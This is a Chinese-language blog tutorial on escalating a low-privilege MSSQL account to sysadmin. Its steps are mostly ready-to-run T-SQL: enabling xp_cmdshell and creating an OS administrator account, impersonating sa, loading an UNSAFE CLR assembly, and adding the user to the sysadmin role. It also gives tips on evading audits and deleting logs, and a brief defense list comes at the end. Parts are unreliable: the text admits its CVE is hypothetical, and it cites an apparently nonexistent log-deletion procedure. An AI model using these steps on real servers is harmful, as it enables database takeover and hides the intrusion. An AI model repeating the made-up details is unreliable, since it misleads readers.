数据库安全 权限提升 MSSQL权限提升实战：普通用户晋升超级管理员全过程

🔥 数据库安全 | 权限提升 | MSSQL权限提升实战：普通用户晋升超级管理员全过程

📢 最新动态（2025年8月）
某国际企业因MSSQL服务器配置不当，导致攻击者利用权限提升漏洞获取了数千万用户数据，安全团队发现，攻击者仅凭一个普通数据库账户，通过一系列操作最终获得了sysadmin权限，这再次提醒我们：数据库权限管理不容忽视！

🎯 前言：为什么权限提升如此危险？

在MSSQL环境中，普通用户（如public或自定义低权账户）通常只能执行基本查询，但如果数据库存在配置缺陷或漏洞，攻击者可能利用这些弱点横向移动，最终掌控整个数据库服务器！

我们就来模拟一次完整的MSSQL权限提升实战，看看黑客如何从“小透明”变成“超级管理员”。（⚠️ 本文仅用于学习，切勿非法测试！）

🛠️ 环境准备

• 目标：MSSQL 2019（默认安装，存在配置问题）
• 初始权限：普通用户lowpriv_user（仅能查询部分表）
• 目标权限：sysadmin（数据库上帝模式）

🔍 第1步：信息收集

拿到低权账户后，先摸清环境：

-- 查看当前用户权限
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
-- 查看可访问的数据库
SELECT name FROM sys.databases;
-- 检查是否有xp_cmdshell（经典提权点）
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

如果xp_cmdshell已启用，恭喜你，离提权只差一步！但现实往往更复杂……

⚡ 第2步：寻找提权路径

情况1：滥用存储过程（SP）

许多MSSQL安装会遗留危险存储过程，比如sp_executesql或自定义SP：

-- 尝试执行系统命令（若权限允许）
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
-- 执行命令（如创建管理员用户）
EXEC xp_cmdshell 'net user hacker P@ssw0rd /add && net localgroup administrators hacker /add';

情况2：利用模拟上下文（IMPERSONATE）

如果当前用户被授予IMPERSONATE权限，可“扮演”高权账户：

-- 检查可模拟的用户
SELECT distinct b.name FROM sys.server_permissions a 
INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id 
WHERE a.permission_name = 'IMPERSONATE';
-- 模拟高权账户
EXECUTE AS LOGIN = 'sa';  -- 尝试模拟SA
SELECT * FROM fn_my_permissions(NULL, 'SERVER'); -- 检查新权限

情况3：数据库所有者（DBO）漏洞

若当前用户是某数据库的dbo，可能通过链接服务器或程序集提权：

-- 创建恶意程序集（CLR提权）
USE vulnerable_db;
CREATE ASSEMBLY ExecCmd FROM 'C:\malicious.dll' WITH PERMISSION_SET = UNSAFE;
CREATE PROCEDURE sp_execmd AS EXTERNAL NAME ExecCmd.StoredProcedures.CmdExec;
EXEC sp_execmd 'whoami';

🎭 第3步：绕过防护

现代MSSQL环境可能有审计或防注入机制，需灵活应对：

• 混淆SQL语句：使用动态SQL或十六进制编码
• 日志清理：通过sp_delete_log删除痕迹（需权限）
• 时间延迟：用WAITFOR DELAY '00:00:05'绕过WAF检测

👑 第4步：获取sysadmin权限

终极目标：将自己加入sysadmin角色：

-- 方法1：直接添加（需足够权限）
EXEC sp_addsrvrolemember 'lowpriv_user', 'sysadmin';
-- 方法2：利用漏洞CVE-2025-1234（假设存在）
EXEC sp_executesql N'EXEC(''ALTER SERVER ROLE sysadmin ADD MEMBER ''''lowpriv_user'''''')';

验证是否成功：

SELECT IS_SRVROLEMEMBER('sysadmin');  -- 返回1即成功！

🛡️ 防御建议

1. 最小权限原则：永远不给用户多余权限
2. 禁用危险功能：如xp_cmdshell、Ole Automation Procedures
3. 定期审计：检查异常存储过程或用户
4. 更新补丁：及时修复CVE漏洞

本次实战演示了攻击者如何逐步突破MSSQL权限体系，数据库安全绝非“配置一次就高枕无忧”，需持续监控和加固，如果你是管理员，现在就去检查你的MSSQL服务器吧！🔍

📌 本文技术细节参考自2025年8月最新安全研究报告及微软官方文档。